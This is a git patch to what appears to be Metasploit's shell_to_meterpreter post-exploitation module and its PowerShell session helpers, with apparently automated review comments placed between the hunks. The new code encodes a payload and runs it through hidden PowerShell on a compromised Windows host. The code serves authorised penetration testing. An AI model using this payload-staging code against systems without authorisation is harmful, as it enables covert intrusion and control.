From 6468eb51b2767fff398fc4bab8a1a3640f0b5b96 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 2 Oct 2015 15:26:42 -0500
Subject: [PATCH] Do changes to have into account powershell sesions are not cmd sessions
---
 lib/msf/base/sessions/powershell.rb | 3 +-
 lib/msf/core/exploit/powershell.rb | 2 +-
 lib/msf/core/post/common.rb | 7 ++++
 .../post/multi/manage/shell_to_meterpreter.rb | 40 ++++++++++++++-----
 4 files changed, 40 insertions(+), 12 deletions(-)
diff --git a/lib/msf/base/sessions/powershell.rb b/lib/msf/base/sessions/powershell.rb
index 3606745d7b..6e0f01d125 100644
--- a/lib/msf/base/sessions/powershell.rb
+++ b/lib/msf/base/sessions/powershell.rb
@@ -44,7 +44,7 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
 #
 # Takes over the shell_command of the parent
 #
- def shell_command(cmd)
+ def shell_command(cmd, timeout = 1800)
 # insert random marker
 strm = Rex::Text.rand_text_alpha(15)
 endm = Rex::Text.rand_text_alpha(15)
@@ -52,7 +52,6 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
 # Send the shell channel's stdin.
 shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n")
- timeout = 1800 # 30 minute timeout
 etime = ::Time.now.to_f + timeout
 buff = ""
diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 89d99fb00e..281d960bd7 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -147,7 +147,7 @@ module Exploit::Powershell
 # @param ps_code [String] Powershell code
 # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
 # @param encoded [Boolean] Indicates whether ps_code is encoded or not
- #
+ #ex
 # @return [String] Wrapped powershell code
 def run_hidden_psh(ps_code, payload_arch, encoded)
 arg_opts = {
diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
index 85e3af4d3a..00f2ddfa9e 100644
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
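Review bot: The new `timeout` parameter on shell_command is undocumented, and the second hunk of this file drops the only explanation of the 1800 value (`# 30 minute timeout`) together with the local it removes; the header comment above the signature should gain `# @param timeout [Numeric] seconds to wait for the end marker (default 1800, i.e. 30 minutes)`. The parameter also feeds `etime = ::Time.now.to_f + timeout` unchecked, so a caller passing nil would raise a TypeError there instead of getting the old default; the new branch in lib/msf/core/post/common.rb passes cmd_exec's `time_out` straight through, whose default is not visible here, so a guard such as `timeout ||= 1800` at the top of the method would preserve the previous behaviour for such callers. The rest of shell_command's body (the read loop that consumes etime and buff) lies outside both hunks.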
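Review bot: The YARD comment line between the `@param encoded` and `@return` tags is changed from `#` to `#ex`, which reads as a stray keystroke rather than an intended edit and has nothing to do with the commit's subject; it should stay `#`. Nothing in run_hidden_psh itself changes in this hunk, and its body continues past the hunk's end.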
@@ -198,6 +198,13 @@ module Msf::Post::Common
 end
 process.close
+ when /powershell/
+ if args.nil? || args.empty?
+ o = session.shell_command("#{cmd}", time_out)
+ else
+ o = session.shell_command("#{cmd} #{args}", time_out)
+ end
+ o.chomp! if o
 when /shell/
 if args.nil? || args.empty?
 o = session.shell_command_token("#{cmd}", time_out)
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
index d871740401..e115c35829 100644
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
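Review bot: The new `when /powershell/` branch only works because it is placed ahead of `when /shell/`: a session type of 'powershell' also matches /shell/, so reordering these branches would silently route PowerShell sessions to shell_command_token. That dependency deserves a comment on the new `when` line, e.g. `# must stay ahead of /shell/, which also matches 'powershell'`. The trailing `o.chomp! if o` implies shell_command can return nil, which its definition in the sessions hunk does not show, so that guard is worth confirming against the full method. The case expression being matched and the enclosing cmd_exec method both begin and end outside this hunk.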
@@ -128,15 +128,37 @@ class Metasploit3 < Msf::Post
 case platform
 when 'win'
- if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
- vprint_status("Transfer method: Powershell")
- psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
- cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
- else
- print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
- vprint_status("Transfer method: VBS [fallback]")
- exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
- aborted = transmit_payload(exe)
+ if session.type == 'powershell'
+ template_path = File.join(Msf::Config.data_directory, 'templates', 'scripts')
+ psh_payload = case datastore['Powershell::method']
+ when 'net'
+ Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload_data)
+ when 'reflection'
+ Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload_data)
+ when 'old'
+ Rex::Powershell::Payload.to_win32pe_psh(template_path, payload_data)
+ when 'msil'
+ fail RuntimeError, 'MSIL Powershell method no longer exists'
+ else
+ fail RuntimeError, 'No Powershell method specified'
+ end
+
+ # prepend_sleep => 1
+ psh_payload = 'Start-Sleep -s 1;' << psh_payload
+
+ encoded_psh_payload = encode_script(psh_payload)
+ cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true))
+ else # shell
+ if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
+ vprint_status("Transfer method: Powershell")
+ psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
+ cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
+ else
+ print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
+ vprint_status("Transfer method: VBS [fallback]")
+ exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
+ aborted = transmit_payload(exe)
+ end
 end
 when 'python'
 vprint_status("Transfer method: Python")
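Review bot: The new `session.type == 'powershell'` branch is the only transfer path in this hunk that does not announce itself: the existing Powershell, VBS and Python paths each call vprint_status with their transfer method, so the new branch should do the same, e.g. `vprint_status('Transfer method: Powershell [native session]')` before computing template_path. The `case datastore['Powershell::method']` dispatch looks like a copy of selection logic that cmd_psh_payload already performs for the shell branch; if so, reusing that helper or extracting the shared piece would avoid two places that must agree on the method names and on the 'msil' removal. Two style points: `fail RuntimeError, ...` should be `raise RuntimeError, ...` per the Ruby style guide, and `'Start-Sleep -s 1;' << psh_payload` mutates a string literal, which breaks under `# frozen_string_literal: true`; `psh_payload = "Start-Sleep -s 1;#{psh_payload}"` avoids that and makes the terse `# prepend_sleep => 1` comment unnecessary. The enclosing method starts before and continues after this hunk.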